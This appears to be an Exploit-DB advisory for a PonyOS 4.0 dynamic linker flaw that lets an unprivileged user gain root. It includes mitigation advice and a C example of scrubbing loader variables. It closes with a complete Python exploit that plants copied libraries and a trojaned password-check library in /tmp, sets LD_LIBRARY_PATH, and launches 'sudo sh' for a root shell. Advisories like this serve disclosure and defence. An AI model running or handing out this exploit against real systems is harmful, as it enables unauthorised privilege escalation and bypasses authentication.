Vendor: PonyOS
By: fluttershy
CVSS: 8.8 (HIGH)
CWE: 94 (Environment Variable Injection)
Product Name: PonyOS
Affected Version From: PonyOS 4.0
Affected Version To: PonyOS 4.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2020

Dynamic Linker Exploit for PonyOS 4.0

PonyOS 4.0 added several improvements over previous releases, including support for setuid binaries and dynamically linked executables. Its run-time linker does not sanitize the environment when it loads a setuid executable, so an unprivileged local user can point LD_LIBRARY_PATH at a directory they control and have a setuid program resolve its shared libraries from there. The exploit below targets sudo: it copies sudo's ordinary dependencies into /tmp unchanged and replaces libtoaru-toaru_auth.so with a library whose toaru_auth_check_pass() never rejects the password, yielding a root shell. Compiling the malicious library requires a C toolchain (build-essential) on the target.

Mitigation:

The run-time linker must treat a setuid or setgid load as a secure execution: ignore loader-controlling variables such as LD_LIBRARY_PATH and LD_PRELOAD and search only the trusted system library directories, as glibc's ld.so does when the kernel flags the process with AT_SECURE. No patch is listed for PonyOS 4.0; until the linker is fixed, setuid programs on the system should not depend on libraries that the loader may resolve through the environment.
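What the fix looks like in practice, as an added example that is not PonyOS or ToaruOS code: a loader-side search-path decision in C that ignores LD_LIBRARY_PATH for secure executions, plus an environment scrub that a setuid program can apply to itself before it execs anything. TRUSTED_LIBDIR, the variable list and the sample environment are assumptions made for illustration; secure_execution() uses Linux's AT_SECURE where it is available and falls back to comparing real and effective ids, which is the condition the PonyOS linker fails to check.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#ifdef __linux__
#include <sys/auxv.h>   /* getauxval(AT_SECURE): the kernel's own verdict */
#endif

/* Where a set-user-ID program's libraries may legitimately come from.
 * Assumed value for this example; PonyOS keeps its libraries in /usr/lib. */
#define TRUSTED_LIBDIR "/usr/lib"

/* Loader-controlling variables an untrusted caller must not be able to
 * hand to a privileged process. Modelled on the names glibc's ld.so drops
 * in secure-execution mode (abbreviated, assumed list). */
static const char *const unsafe_vars[] = {
    "LD_LIBRARY_PATH", "LD_PRELOAD", "LD_AUDIT",
    "LD_DEBUG_OUTPUT", "LD_DYNAMIC_WEAK", "LD_ORIGIN_PATH",
};

/* Does "NAME=value" name one of the unsafe variables? Exact match on the
 * part before '=' so that e.g. "LD_LIBRARY_PATHX=..." is left alone. */
static int is_unsafe(const char *entry)
{
    const char *eq = strchr(entry, '=');
    size_t n = eq ? (size_t)(eq - entry) : strlen(entry);
    for (size_t i = 0; i < sizeof unsafe_vars / sizeof unsafe_vars[0]; i++)
        if (strlen(unsafe_vars[i]) == n && memcmp(unsafe_vars[i], entry, n) == 0)
            return 1;
    return 0;
}

/* Is this process running with more privilege than its invoker? On Linux
 * the kernel sets AT_SECURE for setuid/setgid/file-capability execs; the
 * uid/gid comparison is the portable fallback and covers the PonyOS case. */
int secure_execution(void)
{
#ifdef __linux__
    if (getauxval(AT_SECURE) != 0)
        return 1;
#endif
    return getuid() != geteuid() || getgid() != getegid();
}

/* Remove every unsafe variable from envp in place (envp is NULL-terminated,
 * as the kernel hands it to the loader). Returns the number removed. */
size_t scrub_loader_env(char **envp)
{
    size_t removed = 0, w = 0;
    for (size_t r = 0; envp[r] != NULL; r++) {
        if (is_unsafe(envp[r])) {
            removed++;
            continue;
        }
        envp[w++] = envp[r];
    }
    envp[w] = NULL;
    return removed;
}

/* The decision the PonyOS 4.0 linker gets wrong: where to look for a
 * library. An ordinary process gets its LD_LIBRARY_PATH honoured; a secure
 * execution searches only the trusted directory, whatever the environment
 * says. */
const char *library_search_path(char **envp, int secure)
{
    if (!secure) {
        for (size_t i = 0; envp[i] != NULL; i++)
            if (strncmp(envp[i], "LD_LIBRARY_PATH=", 16) == 0)
                return envp[i] + 16;
    }
    return TRUSTED_LIBDIR;
}

int main(void)
{
    /* Constructed environment of the kind the exploit builds:
     * LD_LIBRARY_PATH points at an attacker-writable directory. */
    char *env[] = { "LD_LIBRARY_PATH=/tmp", "PATH=/bin:/usr/bin",
                    "LD_PRELOAD=/tmp/evil.so", "HOME=/home/pony", NULL };

    printf("unprivileged process searches: %s\n", library_search_path(env, 0));
    printf("setuid process searches:       %s\n", library_search_path(env, 1));

    /* A setuid program (or the loader on its behalf) drops the variables so
     * that nothing it later execs inherits them either. */
    size_t dropped = scrub_loader_env(env);
    printf("scrubbed %zu loader variable(s); remaining:", dropped);
    for (size_t i = 0; env[i] != NULL; i++)
        printf(" %s", env[i]);
    printf("\nthis process is a secure execution: %d\n", secure_execution());
    return 0;
}
```

The scrub is deliberately stricter than glibc, which in secure mode still allows an LD_PRELOAD entry without a slash when the library lives in a standard directory and carries the setuid bit; dropping the variables outright is the simpler rule to get right in a small loader.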

Exploit-DB raw data:

#!/usr/bin/python
#PonyOS 4.0 has added several improvements over previous releases
#including support for setuid binaries and dynamic libraries. The
#run-time linker does not sanitize environment variables when
#running setuid files allowing for local root exploitation through
#manipulated LD_LIBRARY_PATH. Requires build-essential installed
#to compile the malicious library.
import shutil
import os

# Attacker-writable directory the setuid target will be made to search first.
LIBDIR = "/tmp"

# Every library sudo links against, except the auth library that is replaced.
# They are copied unchanged so that resolution from LIBDIR still succeeds for
# the libraries that are not tampered with.
LIBS = [
    "libc.so", "libm.so", "libpng15.so", "libtoaru-graphics.so",
    "libtoaru-kbd.so", "libtoaru-rline.so", "libtoaru-list.so",
    "libtoaru-sha2.so", "libtoaru-termemu.so", "libz.so",
]

# Replacement for toaru_auth_check_pass() in libtoaru-toaru_auth.so: it is
# the function sudo calls to validate the password, and this stub never
# rejects it.
MALICIOUS_LIB_SRC = """#include <stdio.h>
#include <stdlib.h>

void toaru_auth_check_pass(char* username, char* password){
\tprintf("[+] pony smash!\\n");
}
"""

if __name__ == "__main__":
    print("[+] fluttershy - dynamic linker exploit for ponyos 4.0")
    for lib in LIBS:
        shutil.copyfile(os.path.join("/usr/lib", lib), os.path.join(LIBDIR, lib))
    with open("/tmp/lib.c", "w") as fd:
        fd.write(MALICIOUS_LIB_SRC)
    # Build the replacement auth library. The object file is written to /tmp
    # explicitly so the script works from any working directory.
    os.system("gcc -fpic -c /tmp/lib.c -o /tmp/lib.o")
    os.system("gcc -shared -o /tmp/libtoaru-toaru_auth.so /tmp/lib.o")
    # The vulnerable linker honours LD_LIBRARY_PATH even for setuid sudo, so
    # sudo loads the copies above, including the trojaned auth library.
    os.environ["LD_LIBRARY_PATH"] = LIBDIR
    os.system("sudo sh")